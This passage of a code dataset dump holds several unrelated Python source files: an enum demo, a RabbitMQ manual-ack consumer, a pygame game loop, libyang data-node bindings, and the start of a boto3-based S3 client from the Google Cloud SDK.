Color.name exists but is not a member\n    except Exception as e:\n        print(\"Members only!\", repr(e))  # AttributeError\n    try:\n        print(Color[2])  # Not allowed\n    except Exception as e:\n        print(\"I am NOT a sequence!\", repr(e))\n\n    # Reverse\n    print(\"But I have built-in reversed:\", tuple(reversed(Color)))\n\n    # Class type, inheritance, structure\n    print(type(Color), \"is an Enum?\", issubclass(Color, Enum))  # , True\n    print(\"MRO:\", Color.mro())  # Color, Enum, _base, object\n    print(\"class:\", dir(Color))\n\n    # Module cleanness\n    del Color, color, member\n    print(\"module:\", globals())  # only Enum and the default __*__\n","sub_path":"enum.py","file_name":"enum.py","file_ext":"py","file_size_in_byte":7136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
+{"seq_id":"3464616","text":"\"\"\"Consumer: auto=False (automatic acknowledgement disabled)\"\"\"\nimport pika\nimport time\n### Create a socket: obtain a connection to the RabbitMQ service ###\nconnection = pika.BlockingConnection(pika.ConnectionParameters('localhost'))\n### Create an AMQP channel ###\nchannel = connection.channel()\n### Declare the queue ###\nchannel.queue_declare(queue='task_queue')  # the queue is named task_queue\n\n### Define the callback that handles incoming messages ###\ndef callback(ch, method, properties, body):\n    print(\"[x] Received %r.\"%body)  # body arrives in binary format\n    # time.sleep(20)\n    print(\"[x] Done\")\n    print(\"method.delivery_tag\", method.delivery_tag)\n    print(\"properties\", properties)\n    ch.basic_ack(delivery_tag=method.delivery_tag)  # acknowledge the message by its delivery tag (ack: acknowledge)\n\n### Consume: tell RabbitMQ to receive and handle messages with the callback ###\nchannel.basic_consume(queue='task_queue',\n                      on_message_callback=callback,  # run the callback once the body is received\n                      auto_ack=False)  # automatic acknowledgement disabled, so messages must be acked manually (same switch as no_ack, just renamed)\nprint(\"[*] Waiting for messages. 
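The consumer above declares task_queue and acknowledges each message manually. A minimal sketch of the matching producer side (not part of the record), publishing through the default exchange:

```python
# Hypothetical producer counterpart for the manual-ack consumer above.
import pika

connection = pika.BlockingConnection(pika.ConnectionParameters('localhost'))
channel = connection.channel()
channel.queue_declare(queue='task_queue')  # idempotent, mirrors the consumer

channel.basic_publish(
    exchange='',               # default exchange routes by queue name
    routing_key='task_queue',
    body='hello worker',
)
connection.close()
```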
To exit press CTRL+C\")\nchannel.start_consuming()  # start consuming","sub_path":"rabbitmq/05.safe_consumer2.py","file_name":"05.safe_consumer2.py","file_ext":"py","file_size_in_byte":1261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
+{"seq_id":"360610412","text":"import pygame\nimport pygame.locals as pl\n\nimport rstore\nimport score\nfrom scene import TitleScene, OptionsScene\nimport tutorial\nimport const\n\nclass JukeBox(object):\n    \"\"\"Game jukebox that handles music and sfx.\n\n    We have three attributes that are important:\n    soundon - this will be true unless we couldn't initialize pygame music\n    musicon - this can be set by the user via the menu\n    sfxon - this can be set by the user via the menu\n    \"\"\"\n\n    def __init__(self):\n        try:\n            pygame.mixer.init()\n        except: \n            self.soundon = False\n        else:\n            self.soundon = True\n\n        # mapping of file names to sound effects and music\n        self.sfx = rstore.sfx\n        self.music = rstore.music\n\n        self.playing = None\n\n        # we let the user configure these\n        self._sfxon = True\n        self._musicon = True\n\n    def play_music(self, name):\n        if self.soundon and self._musicon:\n            pygame.mixer.music.load(self.music[name])\n            # -1 means repeat\n            pygame.mixer.music.play(-1)\n            self.playing = name\n\n    def play_music_if(self, name):\n        \"\"\"Play music if not already playing.\"\"\"\n\n        if self.playing != name:\n            self.play_music(name)\n\n    def stop_music(self):\n        pygame.mixer.music.stop()\n\n    def play_sfx(self, name):\n        if self.soundon and self._sfxon:\n            self.sfx[name].play()\n\n    def toggle_sfx(self):\n        self._sfxon = not self._sfxon\n\n    def toggle_music(self):\n        if self._musicon:\n            self.stop_music()\n            self._musicon = False\n        else:\n            self._musicon = True\n            self.play_music(self.playing)\n\n    def is_sfx_on(self):\n        return self._sfxon\n\n    def is_music_on(self):\n        return self._musicon\n\n\nclass Game(object):\n    def __init__(self):\n        \"\"\"Setup pygame, display, resource loading etc.\"\"\"\n\n        pygame.init()\n        self.screen = pygame.display.set_mode(const.SCREEN_SIZE)\n        pygame.display.set_caption('Save all 8 bits')\n        self.clock = pygame.time.Clock()\n\n        # load images, fonts and sounds\n        rstore.load_resources()\n\n        # high scores\n        score.load_high_scores()\n\n        self.juke = JukeBox()\n\n        self.juke.play_music('reawakening')\n\n        pygame.mouse.set_cursor(*pygame.cursors.tri_left)\n\n    def toggle_option(self, option_name):\n        \"\"\"Change option (tutorial, music, sfx).\"\"\" \n        if (option_name == OptionsScene.OPTION_TUTORIAL):\n            tutorial.is_active = not tutorial.is_active\n        elif (option_name == OptionsScene.OPTION_MUSIC):\n            self.juke.toggle_music()\n        elif (option_name == OptionsScene.OPTION_SFX):\n            self.juke.toggle_sfx()\n\n    def get_options(self):\n        \"\"\"Return current state of options available for options menu screen.\"\"\"\n        return {OptionsScene.OPTION_TUTORIAL: tutorial.is_active,\n                OptionsScene.OPTION_MUSIC: self.juke.is_music_on(),\n                OptionsScene.OPTION_SFX: self.juke.is_sfx_on()}\n\n    def mainloop(self):\n\n        # first scene of the game\n        ascene = TitleScene(self)\n\n        # initialize clock\n        dt = self.clock.tick(const.FPS) / 1000.0\n\n        while ascene != None:\n            # get all events we are interested in.\n            quitevent = False\n            events = []\n            for event in pygame.event.get():\n                if event.type == pygame.QUIT:\n                    quitevent = True\n                if ((event.type == pl.MOUSEBUTTONDOWN) or \n                    (event.type == pl.MOUSEBUTTONUP)):\n                    events.append(event)\n\n            # scene specific updating based on events.\n            ascene.process_input(events, dt)\n\n            # update not based on events.\n            
ascene.update(dt)\n\n # draw to the screen.\n ascene.render(self.screen)\n\n # possible change to new scene.\n ascene = ascene.next\n\n # draw to the screen!\n pygame.display.flip()\n\n # delay for correct time here.\n dt = self.clock.tick(const.FPS) / 1000.0\n\n if quitevent:\n ascene = None\n pygame.quit()\n\ndef main():\n gm = Game()\n gm.mainloop()\n","sub_path":"src/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":4278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"494955675","text":"# Copyright (c) 2020 6WIND S.A.\n# SPDX-License-Identifier: MIT\n\nimport logging\n\nfrom _libyang import ffi\nfrom _libyang import lib\n\nfrom .schema import Module\nfrom .schema import SContainer\nfrom .schema import SLeaf\nfrom .schema import SLeafList\nfrom .schema import SList\nfrom .schema import SNode\nfrom .schema import SRpc\nfrom .schema import Type\nfrom .util import LibyangError\nfrom .util import c2str\nfrom .util import str2c\n\n\nLOG = logging.getLogger(__name__)\n\n\n#------------------------------------------------------------------------------\ndef printer_flags(with_siblings=False, pretty=False, keep_empty_containers=False,\n trim_default_values=False, include_implicit_defaults=False):\n flags = 0\n if with_siblings:\n flags |= lib.LYP_WITHSIBLINGS\n if pretty:\n flags |= lib.LYP_FORMAT\n if keep_empty_containers:\n flags |= lib.LYP_KEEPEMPTYCONT\n if trim_default_values:\n flags |= lib.LYP_WD_TRIM\n if include_implicit_defaults:\n flags |= lib.LYP_WD_ALL\n return flags\n\n\n#------------------------------------------------------------------------------\ndef data_format(fmt_string):\n if fmt_string == 'json':\n return lib.LYD_JSON\n if fmt_string == 'xml':\n return lib.LYD_XML\n if fmt_string == 'lyb':\n return lib.LYD_LYB\n raise ValueError('unknown data format: %r' % fmt_string)\n\n\n#------------------------------------------------------------------------------\ndef path_flags(update=False, rpc_output=False, no_parent_ret=False):\n flags = 0\n if update:\n flags |= lib.LYD_PATH_OPT_UPDATE\n if rpc_output:\n flags |= lib.LYD_PATH_OPT_OUTPUT\n if no_parent_ret:\n flags |= lib.LYD_PATH_OPT_NOPARENTRET\n return flags\n\n\n#------------------------------------------------------------------------------\ndef parser_flags(data=False, config=False, get=False, strict=False,\n trusted=False, no_yanglib=False, rpc=False, rpcreply=False,\n destruct=False, no_siblings=False, explicit=False):\n flags = 0\n if data:\n flags |= lib.LYD_OPT_DATA\n if config:\n flags |= lib.LYD_OPT_CONFIG\n if get:\n flags |= lib.LYD_OPT_GET\n if strict:\n flags |= lib.LYD_OPT_STRICT\n if trusted:\n flags |= lib.LYD_OPT_TRUSTED\n if no_yanglib:\n flags |= lib.LYD_OPT_DATA_NO_YANGLIB\n if rpc:\n flags |= lib.LYD_OPT_RPC\n if rpcreply:\n flags |= lib.LYD_OPT_RPCREPLY\n if destruct:\n flags |= lib.LYD_OPT_DESTRUCT\n if no_siblings:\n flags |= lib.LYD_OPT_NOSIBLINGS\n if explicit:\n flags |= lib.LYD_OPT_EXPLICIT\n return flags\n\n\n#------------------------------------------------------------------------------\nclass DNode:\n \"\"\"\n Data tree node.\n \"\"\"\n def __init__(self, context, node_p):\n \"\"\"\n :arg Context context:\n The libyang.Context python object.\n :arg struct lyd_node * node_p:\n The pointer to the C structure allocated by libyang.so.\n \"\"\"\n self.context = context\n self._node = ffi.cast('struct lyd_node *', node_p)\n\n def name(self):\n return c2str(self._node.schema.name)\n\n def module(self):\n mod = 
lib.lyd_node_module(self._node)\n if not mod:\n raise self.context.error('cannot get module')\n return Module(self.context, mod)\n\n def schema(self):\n return SNode.new(self.context, self._node.schema)\n\n def parent(self):\n if not self._node.parent:\n return None\n return self.new(self.context, self._node.parent)\n\n def root(self):\n node = self\n while node.parent() is not None:\n node = node.parent()\n return node\n\n def first_sibling(self):\n n = lib.lyd_first_sibling(self._node)\n if n == self._node:\n return self\n return self.new(self.context, n)\n\n def siblings(self, include_self=True):\n n = lib.lyd_first_sibling(self._node)\n while n:\n if n == self._node:\n if include_self:\n yield self\n else:\n yield self.new(self.context, n)\n n = n.next\n\n def find_one(self, xpath):\n try:\n return next(self.find_all(xpath))\n except StopIteration:\n return None\n\n def find_all(self, xpath):\n node_set = lib.lyd_find_path(self._node, str2c(xpath))\n if not node_set:\n raise self.context.error('cannot find path')\n try:\n for i in range(node_set.number):\n yield DNode.new(self.context, node_set.d[i])\n finally:\n lib.ly_set_free(node_set)\n\n def path(self):\n path = lib.lyd_path(self._node)\n try:\n return c2str(path)\n finally:\n lib.free(path)\n\n def validate(self, data=False, config=False, get=False, rpc=False,\n rpcreply=False, no_yanglib=False):\n flags = parser_flags(\n data=data, config=config, get=get, rpc=rpc,\n rpcreply=rpcreply, no_yanglib=no_yanglib)\n node_p = ffi.new('struct lyd_node **')\n node_p[0] = self._node\n ret = lib.lyd_validate(node_p, flags, ffi.NULL)\n if ret != 0:\n raise self.context.error('validation failed')\n\n def merge(self, source, destruct=False, no_siblings=False, explicit=False):\n flags = parser_flags(destruct=destruct, no_siblings=no_siblings,\n explicit=explicit)\n ret = lib.lyd_merge(self._node, source._node, flags)\n if ret != 0:\n raise self.context.error('merge failed')\n\n def print_mem(self, fmt,\n with_siblings=False,\n pretty=False,\n include_implicit_defaults=False,\n trim_default_values=False,\n keep_empty_containers=False):\n flags = printer_flags(\n with_siblings=with_siblings, pretty=pretty,\n include_implicit_defaults=include_implicit_defaults,\n trim_default_values=trim_default_values,\n keep_empty_containers=keep_empty_containers)\n buf = ffi.new('char **')\n fmt = data_format(fmt)\n ret = lib.lyd_print_mem(buf, self._node, fmt, flags)\n if ret != 0:\n raise self.context.error('cannot print node')\n try:\n if fmt == lib.LYD_LYB:\n # binary format, do not convert to unicode\n return c2str(buf[0], decode=False)\n return c2str(buf[0], decode=True)\n finally:\n lib.free(buf[0])\n\n def print_file(self, fileobj, fmt,\n with_siblings=False,\n pretty=False,\n include_implicit_defaults=False,\n trim_default_values=False,\n keep_empty_containers=False):\n flags = printer_flags(\n with_siblings=with_siblings, pretty=pretty,\n include_implicit_defaults=include_implicit_defaults,\n trim_default_values=trim_default_values,\n keep_empty_containers=keep_empty_containers)\n fmt = data_format(fmt)\n ret = lib.lyd_print_fd(fileobj.fileno(), self._node, fmt, flags)\n if ret != 0:\n raise self.context.error('cannot print node')\n\n def print_dict(self, strip_prefixes=True, absolute=True,\n with_siblings=False, include_implicit_defaults=False,\n trim_default_values=False, keep_empty_containers=False):\n \"\"\"\n Convert a DNode object to a python dictionary.\n\n :arg DNode dnode:\n The data node to convert.\n :arg bool strip_prefixes:\n If True (the 
default), module prefixes are stripped from dictionary\n keys. If False, dictionary keys are in the form ``:``.\n :arg bool absolute:\n If True (the default), always return a dictionary containing the\n complete tree starting from the root.\n :arg bool with_siblings:\n If True, include the node's siblings.\n :arg bool include_implicit_defaults:\n Include implicit default nodes.\n :arg bool trim_default_values:\n Exclude nodes with the value equal to their default value.\n :arg bool keep_empty_containers:\n Preserve empty non-presence containers.\n \"\"\"\n flags = printer_flags(\n include_implicit_defaults=include_implicit_defaults,\n trim_default_values=trim_default_values,\n keep_empty_containers=keep_empty_containers)\n\n def _to_dict(node, parent_dic):\n if not lib.lyd_node_should_print(node._node, flags):\n return\n if strip_prefixes:\n name = node.name()\n else:\n name = '%s:%s' % (node.module().name(), node.name())\n if isinstance(node, DList):\n list_element = {}\n for child in node:\n _to_dict(child, list_element)\n parent_dic.setdefault(name, []).append(list_element)\n elif isinstance(node, (DContainer, DRpc)):\n container = {}\n for child in node:\n _to_dict(child, container)\n parent_dic[name] = container\n elif isinstance(node, DLeafList):\n parent_dic.setdefault(name, []).append(node.value())\n elif isinstance(node, DLeaf):\n parent_dic[name] = node.value()\n\n dic = {}\n dnode = self\n if absolute:\n dnode = dnode.root()\n if with_siblings:\n for sib in dnode.siblings():\n _to_dict(sib, dic)\n else:\n _to_dict(dnode, dic)\n return dic\n\n def merge_data_dict(self, dic, rpc=False, rpcreply=False, strict=False,\n data=False, config=False, no_yanglib=False):\n \"\"\"\n Merge a python dictionary into this node. The returned value is the\n first created node.\n\n :arg dict dic:\n The python dictionary to convert.\n :arg bool rpc:\n Data represents RPC or action input parameters.\n :arg bool rpcreply:\n Data represents RPC or action output parameters.\n :arg bool strict:\n Instead of ignoring (with a warning message) data without schema\n definition, raise an error.\n :arg bool data:\n Complete datastore content with configuration as well as state\n data. To handle possibly missing (but by default required)\n ietf-yang-library data, use no_yanglib=True.\n :arg bool config:\n Complete datastore without state data.\n :arg bool no_yanglib:\n Ignore (possibly) missing ietf-yang-library data. 
Applicable only\n with data=True.\n \"\"\"\n return dict_to_dnode(dic, self.module(), parent=self,\n rpc=rpc, rpcreply=rpcreply, strict=strict,\n data=data, config=config, no_yanglib=no_yanglib)\n\n def free(self, with_siblings=True):\n try:\n if with_siblings:\n lib.lyd_free_withsiblings(self._node)\n else:\n lib.lyd_free(self._node)\n finally:\n self._node = None\n\n def __repr__(self):\n cls = self.__class__\n return '<%s.%s: %s>' % (cls.__module__, cls.__name__, str(self))\n\n def __str__(self):\n return self.name()\n\n NODETYPE_CLASS = {}\n\n @classmethod\n def register(cls, *nodetypes):\n def _decorator(nodeclass):\n for t in nodetypes:\n cls.NODETYPE_CLASS[t] = nodeclass\n return nodeclass\n return _decorator\n\n @classmethod\n def new(cls, context, node_p):\n node_p = ffi.cast('struct lyd_node *', node_p)\n nodecls = cls.NODETYPE_CLASS.get(node_p.schema.nodetype, DNode)\n return nodecls(context, node_p)\n\n\n#------------------------------------------------------------------------------\n@DNode.register(SNode.CONTAINER)\nclass DContainer(DNode):\n\n def create_path(self, path, value=None, rpc_output=False):\n return self.context.create_data_path(\n path, parent=self, value=value, rpc_output=rpc_output)\n\n def children(self):\n child = self._node.child\n while child:\n yield DNode.new(self.context, child)\n child = child.next\n\n def __iter__(self):\n return self.children()\n\n\n#------------------------------------------------------------------------------\n@DNode.register(SNode.RPC)\nclass DRpc(DContainer):\n pass\n\n\n#------------------------------------------------------------------------------\n@DNode.register(SNode.LIST)\nclass DList(DContainer):\n pass\n\n\n#------------------------------------------------------------------------------\n@DNode.register(SNode.LEAF)\nclass DLeaf(DNode):\n\n def __init__(self, context, node_p):\n super().__init__(context, node_p)\n self._leaf = ffi.cast('struct lyd_node_leaf_list *', node_p)\n\n def value(self):\n if self._leaf.value_type == Type.EMPTY:\n return None\n if self._leaf.value_type in Type.NUM_TYPES:\n return int(c2str(self._leaf.value_str))\n if self._leaf.value_type in (\n Type.STRING, Type.BINARY, Type.ENUM, Type.IDENT, Type.BITS):\n return c2str(self._leaf.value_str)\n if self._leaf.value_type == Type.DEC64:\n return lib.lyd_dec64_to_double(self._node)\n if self._leaf.value_type == Type.LEAFREF:\n referenced = DNode.new(self.context, self._leaf.value.leafref)\n return referenced.value()\n if self._leaf.value_type == Type.BOOL:\n return bool(self._leaf.value.bln)\n return None\n\n\n#------------------------------------------------------------------------------\n@DNode.register(SNode.LEAFLIST)\nclass DLeafList(DLeaf):\n pass\n\n\n#------------------------------------------------------------------------------\ndef dict_to_dnode(dic, module, parent=None, rpc=False, rpcreply=False,\n strict=False, data=False, config=False, no_yanglib=False):\n \"\"\"\n Convert a python dictionary to a DNode object given a YANG module object.\n The return value is the first created node. If parent is not set, a\n top-level node is returned.\n\n :arg dict dic:\n The python dictionary to convert.\n :arg Module module:\n The libyang Module object associated with the dictionary.\n :arg DNode parent:\n Optional parent to update. 
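A hedged usage sketch for dict_to_dnode (the Context import path, the 'example' module name and its 'hostname' leaf are assumptions for illustration): load a schema, build a data tree from a plain dict, and print it with DNode.print_mem as defined above:

```python
# Hypothetical round trip: python dict -> DNode -> XML. The YANG module
# name and leaf are made up; any loaded module with matching nodes works.
from libyang import Context

ctx = Context()                       # default search paths assumed
module = ctx.load_module('example')   # hypothetical module
dnode = dict_to_dnode({'hostname': 'router1'}, module, config=True)
if dnode is not None:
    print(dnode.print_mem('xml', pretty=True))
    dnode.free()
```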
If not specified a new top-level DNode will\n be created.\n :arg bool rpc:\n Data represents RPC or action input parameters.\n :arg bool rpcreply:\n Data represents RPC or action output parameters.\n :arg bool strict:\n Instead of ignoring (with a warning message) data without schema\n definition, raise an error.\n :arg bool data:\n Complete datastore content with configuration as well as state\n data. To handle possibly missing (but by default required)\n ietf-yang-library data, use no_yanglib=True.\n :arg bool config:\n Complete datastore without state data.\n :arg bool no_yanglib:\n Ignore (possibly) missing ietf-yang-library data. Applicable only\n with data=True.\n \"\"\"\n if not dic:\n return None\n\n if not isinstance(dic, dict):\n raise TypeError('dic argument must be a python dict')\n if not isinstance(module, Module):\n raise TypeError('module argument must be a Module object')\n if parent is not None and not isinstance(parent, DNode):\n raise TypeError('parent argument must be a DNode object or None')\n\n created = []\n\n def _create_leaf(_parent, module, name, value, in_rpc_output=False):\n if value is not None:\n if isinstance(value, bool):\n value = str(value).lower()\n elif not isinstance(value, str):\n value = str(value)\n if in_rpc_output:\n n = lib.lyd_new_output_leaf(\n _parent, module._module, str2c(name), str2c(value))\n else:\n n = lib.lyd_new_leaf(\n _parent, module._module, str2c(name), str2c(value))\n if not n:\n if _parent:\n parent_path = repr(DNode.new(module.context, _parent).path())\n else:\n parent_path = 'module %r' % module.name()\n raise module.context.error(\n 'failed to create leaf %r as a child of %s', name, parent_path)\n created.append(n)\n\n def _create_container(_parent, module, name, in_rpc_output=False):\n if in_rpc_output:\n n = lib.lyd_new_output(_parent, module._module, str2c(name))\n else:\n n = lib.lyd_new(_parent, module._module, str2c(name))\n if not n:\n if _parent:\n parent_path = repr(DNode.new(module.context, _parent).path())\n else:\n parent_path = 'module %r' % module.name()\n raise module.context.error(\n 'failed to create container/list/rpc %r as a child of %s',\n name, parent_path)\n created.append(n)\n return n\n\n schema_cache = {}\n\n def _find_schema(schema_parent, name, prefix):\n if isinstance(schema_parent, Module):\n cache_key = (schema_parent._module, name, prefix)\n else:\n cache_key = (schema_parent._node, name, prefix)\n snode, module = schema_cache.get(cache_key, (None, None))\n if snode is not None:\n return snode, module\n if isinstance(schema_parent, SRpc):\n if rpc:\n schema_parent = schema_parent.input()\n elif rpcreply:\n schema_parent = schema_parent.output()\n else:\n raise ValueError('rpc or rpcreply must be specified')\n if schema_parent is None:\n # there may not be any input or any output node in the rpc\n return None, None\n for s in schema_parent:\n if s.name() != name:\n continue\n mod = s.module()\n if prefix is not None and mod.name() != prefix:\n continue\n snode = s\n module = mod\n break\n schema_cache[cache_key] = (snode, module)\n return snode, module\n\n keys_cache = {}\n\n def _dic_keys(_dic, _schema):\n if isinstance(_schema, SList):\n # list keys must be first and in the order specified in the schema\n list_keys = keys_cache.get(_schema._node, None)\n if list_keys is None:\n list_keys = tuple(k.name() for k in _schema.keys())\n keys_cache[_schema._node] = list_keys\n keys = []\n for k in list_keys:\n if k in _dic:\n keys.append(k)\n keys.extend(_dic.keys() - list_keys)\n return keys\n return 
_dic.keys()\n\n    def _to_dnode(_dic, _schema, _parent=ffi.NULL, in_rpc_output=False):\n        for key in _dic_keys(_dic, _schema):\n            if ':' in key:\n                prefix, name = key.split(':')\n            else:\n                prefix, name = None, key\n\n            s, module = _find_schema(_schema, name, prefix)\n            if not s:\n                if isinstance(_schema, Module):\n                    path = _schema.name()\n                elif isinstance(_schema, SNode):\n                    path = _schema.schema_path()\n                else:\n                    path = str(_schema)\n                if strict:\n                    raise LibyangError('%s: unknown element %r' % (path, key))\n                LOG.warning('%s: skipping unknown element %r', path, key)\n                continue\n\n            value = _dic[key]\n\n            if isinstance(s, SLeaf):\n                _create_leaf(_parent, module, name, value, in_rpc_output)\n\n            elif isinstance(s, SLeafList):\n                if not isinstance(value, (list, tuple)):\n                    raise TypeError('%s: python value is not a list/tuple: %r'\n                                    % (s.schema_path(), value))\n                for v in value:\n                    _create_leaf(_parent, module, name, v, in_rpc_output)\n\n            elif isinstance(s, SRpc):\n                n = _create_container(_parent, module, name, in_rpc_output)\n                _to_dnode(value, s, n, rpcreply)\n\n            elif isinstance(s, SContainer):\n                n = _create_container(_parent, module, name, in_rpc_output)\n                _to_dnode(value, s, n, in_rpc_output)\n\n            elif isinstance(s, SList):\n                if not isinstance(value, (list, tuple)):\n                    raise TypeError('%s: python value is not a list/tuple: %r'\n                                    % (s.schema_path(), value))\n                for v in value:\n                    if not isinstance(v, dict):\n                        raise TypeError('%s: list element is not a dict: %r'\n                                        % (_schema.schema_path(), v))\n                    n = _create_container(_parent, module, name, in_rpc_output)\n                    _to_dnode(v, s, n, in_rpc_output)\n\n    result = None\n\n    try:\n        if parent is not None:\n            _parent = parent._node\n            _schema_parent = parent.schema()\n        else:\n            _parent = ffi.NULL\n            _schema_parent = module\n        _to_dnode(dic, _schema_parent, _parent,\n                  in_rpc_output=rpcreply and isinstance(parent, DRpc))\n        if created:\n            result = DNode.new(module.context, created[0])\n            result.validate(rpc=rpc, rpcreply=rpcreply,\n                            data=data, config=config, no_yanglib=no_yanglib)\n    except:\n        for c in reversed(created):\n            lib.lyd_free(c)\n        raise\n\n    return result\n","sub_path":"libyang/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":21923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
+{"seq_id":"561712627","text":"# Lint as: python3\n# -*- coding: utf-8 -*- #\n# Copyright 2020 Google LLC. 
All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Implementation of CloudApi for s3 using boto3.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import unicode_literals\n\nimport threading\n\nimport boto3\nimport botocore\nfrom googlecloudsdk.api_lib.storage import cloud_api\nfrom googlecloudsdk.api_lib.storage import errors\nfrom googlecloudsdk.api_lib.storage import s3_metadata_util\nfrom googlecloudsdk.command_lib.storage import errors as command_errors\nfrom googlecloudsdk.command_lib.storage import hash_util\nfrom googlecloudsdk.command_lib.storage import storage_url\nfrom googlecloudsdk.command_lib.storage.resources import s3_resource_reference\nfrom googlecloudsdk.core import exceptions as core_exceptions\nfrom googlecloudsdk.core import log\nfrom googlecloudsdk.core import properties\nfrom googlecloudsdk.core.util import files\nfrom googlecloudsdk.core.util import scaled_integer\n\n\n# S3 does not allow upload of size > 5 GiB for put_object.\nMAX_PUT_OBJECT_SIZE = 5 * (1024**3) # 5 GiB\nBOTO3_CLIENT_LOCK = threading.Lock()\n\n\ndef _raise_if_not_found_error(error, resource_name):\n if error.response.get('ResponseMetadata', {}).get('HTTPStatusCode') == 404:\n # TODO(b/193464904): Remove the hardcoded error message here after\n # refactoring the errors module.\n raise errors.NotFoundError('{} not found: 404.'.format(resource_name))\n\n\ndef _catch_client_error_raise_s3_api_error(format_str=None):\n \"\"\"Decorator that catches botocore ClientErrors and raises S3ApiErrors.\n\n Args:\n format_str (str): A googlecloudsdk.api_lib.storage.errors.S3ErrorPayload\n format string. 
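The decorator defined below wraps botocore ClientErrors into S3ApiErrors at every client boundary. A generic sketch of that error-translation pattern (illustrative names, not the SDK's real helpers):

```python
# Generic error-translation decorator: catch one exception type and
# re-raise it as another, preserving the original as the cause.
import functools

class WrappedError(Exception):
    pass

def translate_errors(source_cls, target_cls):
    def decorator(func):
        @functools.wraps(func)
        def wrapper(*args, **kwargs):
            try:
                return func(*args, **kwargs)
            except source_cls as error:
                raise target_cls(str(error)) from error
        return wrapper
    return decorator

@translate_errors(KeyError, WrappedError)
def lookup(mapping, key):
    return mapping[key]
```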
Note that any properties that are accessed here are on the\n S3ErrorPayload object, not the object returned from botocore.\n\n Returns:\n A decorator that catches botocore.exceptions.ClientError and returns an\n S3ApiError with a formatted error message.\n \"\"\"\n\n return errors.catch_error_raise_cloud_api_error(\n [(botocore.exceptions.ClientError, errors.S3ApiError)],\n format_str=format_str)\n\n\n# pylint:disable=abstract-method\nclass S3Api(cloud_api.CloudApi):\n \"\"\"S3 Api client.\"\"\"\n\n capabilities = {\n # Boto3 implements its own unskippable validation.\n cloud_api.Capability.CLIENT_SIDE_HASH_VALIDATION,\n }\n\n def __init__(self):\n # Using a lock since the boto3.client creation is not thread-safe.\n with BOTO3_CLIENT_LOCK:\n self.client = boto3.client(\n storage_url.ProviderPrefix.S3.value,\n endpoint_url=properties.VALUES.storage.s3_endpoint_url.Get())\n\n @_catch_client_error_raise_s3_api_error()\n def create_bucket(self, bucket_resource, fields_scope=None):\n \"\"\"See super class.\"\"\"\n del fields_scope # Unused in S3 client.\n\n if bucket_resource.retention_period:\n raise ValueError(\n 'S3 API does not accept retention_period argument for create_bucket.')\n if bucket_resource.storage_class:\n raise ValueError(\n 'S3 API does not accept storage_class argument for create_bucket.')\n if bucket_resource.uniform_bucket_level_access:\n raise ValueError(\n 'S3 API does not accept uniform_bucket_level_access argument for create_bucket.'\n )\n\n if bucket_resource.location:\n with BOTO3_CLIENT_LOCK:\n # Create client with appropriate endpoint for creating regional bucket.\n client = boto3.client(\n storage_url.ProviderPrefix.S3.value,\n region_name=bucket_resource.location,\n endpoint_url=properties.VALUES.storage.s3_endpoint_url.Get())\n create_bucket_configuration = {\n 'LocationConstraint': bucket_resource.location\n }\n else:\n client = self.client\n # Must match client's default regional endpoint.\n create_bucket_configuration = {\n 'LocationConstraint': boto3.session.Session().region_name\n }\n\n metadata = client.create_bucket(\n Bucket=bucket_resource.storage_url.bucket_name,\n CreateBucketConfiguration=create_bucket_configuration)\n backend_location = metadata.get('Location')\n return s3_resource_reference.S3BucketResource(\n bucket_resource.storage_url,\n location=backend_location,\n metadata=metadata)\n\n @_catch_client_error_raise_s3_api_error()\n def delete_bucket(self, bucket_name, request_config):\n \"\"\"See super class.\"\"\"\n del request_config # Unused.\n return self.client.delete_bucket(Bucket=bucket_name)\n\n def get_bucket(self, bucket_name, fields_scope=cloud_api.FieldsScope.NO_ACL):\n \"\"\"See super class.\"\"\"\n metadata = {'Name': bucket_name}\n # TODO (b/168716392): As new commands are implemented, they may want\n # specific error handling for different methods.\n try:\n # Low-bandwidth way to determine if bucket exists for FieldsScope.SHORT.\n metadata.update(self.client.get_bucket_location(\n Bucket=bucket_name))\n except botocore.exceptions.ClientError as error:\n _raise_if_not_found_error(error, bucket_name)\n\n metadata['LocationConstraint'] = errors.S3ApiError(error)\n\n if fields_scope is not cloud_api.FieldsScope.SHORT:\n # Data for FieldsScope.NO_ACL.\n for key, api_call, result_has_key in [\n ('CORSRules', self.client.get_bucket_cors, True),\n ('ServerSideEncryptionConfiguration',\n self.client.get_bucket_encryption, True),\n ('LifecycleConfiguration',\n self.client.get_bucket_lifecycle_configuration, False),\n ('LoggingEnabled', 
self.client.get_bucket_logging, True),\n ('Payer', self.client.get_bucket_request_payment, True),\n ('Versioning', self.client.get_bucket_versioning, False),\n ('Website', self.client.get_bucket_website, False),\n ]:\n try:\n api_result = api_call(Bucket=bucket_name)\n # Some results are wrapped in dictionaries with keys matching \"key\".\n metadata[key] = api_result.get(key) if result_has_key else api_result\n except botocore.exceptions.ClientError as error:\n metadata[key] = errors.S3ApiError(error)\n\n # User requested ACL's with FieldsScope.FULL.\n if fields_scope is cloud_api.FieldsScope.FULL:\n try:\n metadata['ACL'] = self.client.get_bucket_acl(Bucket=bucket_name)\n except botocore.exceptions.ClientError as error:\n metadata['ACL'] = errors.S3ApiError(error)\n\n return s3_resource_reference.S3BucketResource(\n storage_url.CloudUrl(storage_url.ProviderPrefix.S3, bucket_name),\n metadata=metadata)\n\n def patch_bucket(self,\n bucket_resource,\n request_config,\n fields_scope=cloud_api.FieldsScope.NO_ACL):\n \"\"\"See super class.\"\"\"\n del fields_scope, request_config # Unused.\n\n if ('FullACLConfiguration' in bucket_resource.metadata or\n 'ACL' in bucket_resource.metadata):\n try:\n if 'FullACLConfiguration' in bucket_resource.metadata:\n # Can contain canned ACL and other settings.\n # Takes priority over 